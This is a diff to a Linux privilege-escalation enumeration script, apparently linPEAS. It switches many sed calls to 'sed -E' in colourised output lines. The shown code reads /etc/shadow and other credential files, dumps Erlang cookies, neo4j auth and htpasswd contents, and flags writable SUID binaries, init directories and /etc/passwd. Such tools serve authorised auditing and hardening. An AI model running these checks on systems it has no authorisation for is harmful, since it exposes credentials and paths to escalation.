@ -2043,7 +2043,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  printf $Y"[+] "$GREEN"Searching tmux sessions\n"$N
  printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC
  if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then
-    printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed "s,.*,${C}[1;31m&${C}[0m," | sed "s,no server running on.*,${C}[32m&${C}[0m,"
+    printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," | sed -E "s,no server running on.*,${C}[32m&${C}[0m,"
  else echo_not_found "tmux"
  fi
  echo ""
@ -2084,7 +2084,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
      df=$(echo $d |cut -d ':' -f1)
      dp=$(echo $d |cut -d ':' -f2-)
      echo "Found possible PLAIN text creds in $df"
-      echo "$dp" | sed "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
+      echo "$dp" | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
 	  done
 	fi
  echo ""
@ -2106,7 +2106,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  for d in $neo4j; do
    if [ -r "$d" ]; then 
      echo "Found readable $d"
-      find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
+      find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
    fi
  done
  echo ""
@ -2128,7 +2128,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  for f in $erlangcoo; do
    if [ -r "$f" ]; then 
      echo "Found Erlang cookie: $f"
-      cat "$f" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
+      cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
    fi
  done
  echo ""
@ -2164,7 +2164,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  for d in $irssifols; do
    if [ -r "$d/config" ]; then 
      echo "Found IRSSI config file: $d/config"
-      cat "$d/config" 2>/dev/null | sed "s,password.*,${C}[1;31m&${C}[0m,"
+      cat "$d/config" 2>/dev/null | sed -E "s,password.*,${C}[1;31m&${C}[0m,"
    fi
  done
  echo ""
@ -2185,9 +2185,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
  printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC
  for s in `find / -perm -4000 2>/dev/null`; do
    if [ -O "$s" ]; then
-      echo "You own the SUID file: $s" | sed "s,.*,${C}[1;31m&${C}[0m,"
+      echo "You own the SUID file: $s" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
    elif [ -w "$s" ]; then #If write permision, win found (no check exploits)
-      echo "You can write SUID file: $s" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
+      echo "You can write SUID file: $s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
    else
      c="a"
      for b in $sidB; do
@ -2209,7 +2209,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
  printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC
  for s in `find / -perm -g=s -type f 2>/dev/null`; do
    if [ -w $s ]; then #If write permision, win found (no check exploits)
-      echo "You can write SUID file: $s" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
+      echo "You can write SUID file: $s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
    else
      c="a"
      for b in $sidB; do
@ -2235,7 +2235,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
    if [ "`echo \"$l\" | grep include`" ]; then
      ini_path="`echo \"$l\" | cut -d " " -f 2`"
      fpath="`dirname \"$ini_path\"`"
-      if [ "`find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+      if [ "`find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
      printf $ITALIC"$fpath\n"$NC | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g"
      for f in $fpath/*; do
        printf $ITALIC"  $f\n"$NC | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g"
@ -2259,7 +2259,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
  for cb in "`getcap -r / 2>/dev/null`"; do
    echo "$cb" | sed -E "s,$sudocapsB,${C}[1;31m&${C}[0m," | sed -E "s,$capsB,${C}[1;31m&${C}[0m,"
    if [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then
-      echo "$cb is writable" | sed "s,.*,${C}[1;31m&${C}[0m,"
+      echo "$cb is writable" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
    fi
  done
  echo ""
@ -2288,9 +2288,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
  ##-- IF) Unexpected folders in /
  printf $Y"[+] "$GREEN"Unexpected folders in root\n"$NC
  if [ "$MACPEAS" ]; then
-    (find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsMacG" | sed "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found
+    (find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsMacG" | sed -E "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found
  else
-    (find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsG" | sed "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found
+    (find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsG" | sed -E "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found
  fi
  echo ""

@ -2299,9 +2299,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
  printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files\n"$NC
  if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS
    (ls -la /etc/profile.d/ | sed -E "s,$profiledG,${C}[1;32m&${C}[0m,") || echo_not_found "/etc/profile.d/"
-    if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ "`find /etc/profile.d/ -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/profile.d/ -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ "`find /etc/profile.d/ -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/profile.d/ -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
  fi
  echo ""

@ -2309,46 +2309,46 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
  printf $Y"[+] "$GREEN"Permissions in init, init.d, systemd, and rc.d\n"$NC
  printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d\n"$NC
  if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS
-    if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ "`find /etc/init/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ "`find /etc/init.d/ -type f -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ "`find /etc/rc.d/init.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ "`find /usr/local/etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ "`find /etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ "`find /etc/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
-    if [ "`find /lib/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ "`find /etc/init/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ "`find /etc/init.d/ -type f -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ "`find /etc/rc.d/init.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ "`find /usr/local/etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ "`find /etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ "`find /etc/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
+    if [ "`find /lib/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
  fi
  echo ""

  ##-- IF) Hashes in passwd file
  printf $Y"[+] "$GREEN"Hashes inside passwd file? ........... "$NC
-  if [ "`grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
+  if [ "`grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
  else echo_no
  fi

  ##-- IF) Writable in passwd file
  printf $Y"[+] "$GREEN"Writable passwd file? ................ "$NC
-  if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
-  elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
-  elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
+  if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
+  elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
+  elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
  else echo_no
  fi

  ##-- IF) Credentials in fstab
  printf $Y"[+] "$GREEN"Credentials in fstab/mtab? ........... "$NC
-  if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
+  if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
  else echo_no
  fi

  ##-- IF) Read shadow files
  printf $Y"[+] "$GREEN"Can I read shadow files? ............. "$NC
-  if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
+  if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
  else echo_no
  fi

@ -2360,8 +2360,8 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then

  ##-- IF) network-scripts
  printf $Y"[+] "$GREEN"Can I write in network-scripts? ...... "$NC
-  if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
-  elif [ "`find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
+  if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
+  elif [ "`find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
  else echo_no
  fi

@ -2385,7 +2385,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
  ##-- IF) Readable files belonging to root and not world readable
  if ! [ "$IAMROOT" ]; then
    printf $Y"[+] "$GREEN"Readable files belonging to root and readable by me but not world readable\n"$NC
-    (for f in `find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal"`; do if [ -r $f ]; then ls -l $f 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found
+    (for f in `find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal"`; do if [ -r $f ]; then ls -l $f 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found
    echo ""
  fi
  
@ -2505,7 +2505,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
        echo ""
      elif [ `echo $f | grep "htpasswd" ` ]; then
        printf $GREEN"Reading $f\n"$NC
-        cat "$f" | sed "s,.*,${C}[1;31m&${C}[0m,"
+        cat "$f" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
        echo ""
      fi;
    fi;